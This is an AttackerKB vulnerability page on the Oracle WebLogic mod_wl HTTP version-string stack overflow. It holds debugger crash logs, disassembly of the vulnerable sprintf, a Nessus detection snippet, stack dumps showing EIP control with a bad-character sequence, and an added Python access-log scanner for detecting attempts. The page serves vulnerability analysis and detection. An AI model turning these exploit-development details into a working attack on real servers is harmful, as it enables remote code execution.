AttackerKB AKB:957310CF-4BD0-42F5-9281-6952E61636A6
History: Jul 22, 2008 - 12:00 a.m.

Oracle mod_wl HTTP POST Request Remote Buffer Overflow Vulnerability

2008-07-22 00:00:00
attackerkb.com

EPSS: 0.94 (High)
Percentile: 99.2%

Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.

Recent assessments:

wchen-r7 at September 12, 2019 6:07pm UTC reported:

Details

Bea Weblogic 8.1 + Apache
<http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html>

First crash

(328.c38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll -
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8
eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0         ov up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010a03
RPCRT4!NdrVaryingArrayUnmarshall+0x81:
77ea4126 008945107416    add     byte ptr [ecx+16741045h],cl ds:0023:59b75388=??
0:132> .symfix
0:132> .reload
Reloading current modules
.............................................
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0:132> kb
ChildEBP RetAddr  Args to Child
0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a
0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f
0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

More controlled crash: length 4100

ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a
0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f
0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

mod_wl detection via Nessus

weblogic_mod_wl_overflow.nasl: "TITLE>Weblogic Bridge Message" >< res[2] ||

POST /index.jsp  HTTP/1.1
Host: 192.168.1.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: -1

TML>
<HEAD>
<TITLE>Weblogic Bridge Message
</TITLE>
</HEAD>
 <BODY>
<h2>Failure of server APACHE bridge:</h2><p>
<hr><pre>Internal Server failure, APACHE plugin.  Cannot continue.</pre>
<hr><br><b>Build date/time:</b> <i>Jun 16 2006 15:14:11</i>
<p><hr><b>Change Number:</b> <i>779586</i>
 </BODY>
</HTML>
<HTML>
<HEAD>
<TITLE>Weblogic Bridge Message

mod_wl overflow

.text:1000E751                 push    ecx             ; it should be HTTP/1.1 but.... failed :)
.text:1000E752                 push    edx
.text:1000E753                 mov     edx, [ebp+214h]
.text:1000E759                 push    edx
.text:1000E75A                 push    offset aSSS     ; "%s %s %s\r\n"
.text:1000E75F                 push    eax             ; Dest
.text:1000E760                 call    ds:sprintf      ; here is where the overflow happens!

GET EIP on RET

0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mod_wl_20+0xedeb:
1000edeb 81c41c100000    add     esp,101Ch
0:244> db esp
0440c7b8  1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00  ............J...
0440c7c8  48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e  Host: 192.168.1.
0440c7d8  31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a  130..User-Agent:
0440c7e8  20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f   Mozilla/4.0 (co
0440c7f8  6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36  mpatible; MSIE 6
0440c808  2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35  .0; Windows NT 5
0440c818  2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70  .1)..Content-Typ
0440c828  65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78  e: application/x
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mod_wl_20+0xedf1:
1000edf1 c3              ret
0:244> db esp
0440d7d4  41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08  AAAAAAAA........
0440d7e4  09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a  ................
0440d7f4  1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a  ..... !"#$%&'()*
0440d804  2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a  +,-./0123456789:
0440d814  3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b  ;<=>@ABCDEFGHIJK
0440d824  4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b  LMNOPQRSTUVWXYZ[
0440d834  5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b  \]^_`abcdefghijk
0440d844  6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b  lmnopqrstuvwxyz{
0:244> t
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
41414141 ??              ???

References

<http://www.securityfocus.com/bid/30273/info>

Assessed Attacker Value: 0
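As an added defender-side example (not part of the assessment above and not AttackerKB's code): the overflow is reached through an oversized HTTP version token in the request line that mod_wl copies with sprintf, so the request lines Apache records in its access log are a natural place to look for attempts. The combined-log regex, the 16-byte threshold, the Finding fields and the sample log lines below are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Apache combined log format (assumed): client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) '
)
# A well-formed third token of the request line is exactly HTTP/<digit>.<digit>
VERSION_RE = re.compile(r"^HTTP/\d\.\d$")
MAX_VERSION_LEN = 16  # constructed threshold: far above any legitimate version token


@dataclass
class Finding:
    client: str
    method: str
    uri: str
    reason: str


def check_request_line(request: str):
    """Return why a request line looks like a mod_wl version-string overflow attempt, or None."""
    parts = request.split(" ")
    if len(parts) < 3:
        return None  # HTTP/0.9-style or truncated line; not the pattern described on this page
    version = " ".join(parts[2:])  # everything after the URI is the "version" sprintf copies
    if len(version) > MAX_VERSION_LEN:
        return f"oversized HTTP version token ({len(version)} bytes)"
    if not VERSION_RE.match(version):
        return f"malformed HTTP version token {version!r}"
    return None


def scan_access_log(lines):
    """Parse access-log lines and collect requests whose version token is suspicious."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        reason = check_request_line(m.group("request"))
        if reason:
            method, uri = m.group("request").split(" ")[:2]
            findings.append(Finding(m.group("client"), method, uri, reason))
    return findings


# Constructed sample log lines: one benign request, one 4100-byte version token
# (the "more controlled crash" length noted above), one malformed version token.
SAMPLE_LOG = [
    '192.168.1.10 - - [22/Jul/2008:10:00:01 +0000] "POST /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.77 - - [22/Jul/2008:10:00:02 +0000] "POST /index.jsp ' + "A" * 4100 + '" 500 0 "-" "Mozilla/4.0"',
    '192.168.1.78 - - [22/Jul/2008:10:00:03 +0000] "GET /a.jsp HTTP/1.1x" 400 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.client} {f.method} {f.uri}: {f.reason}")
```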
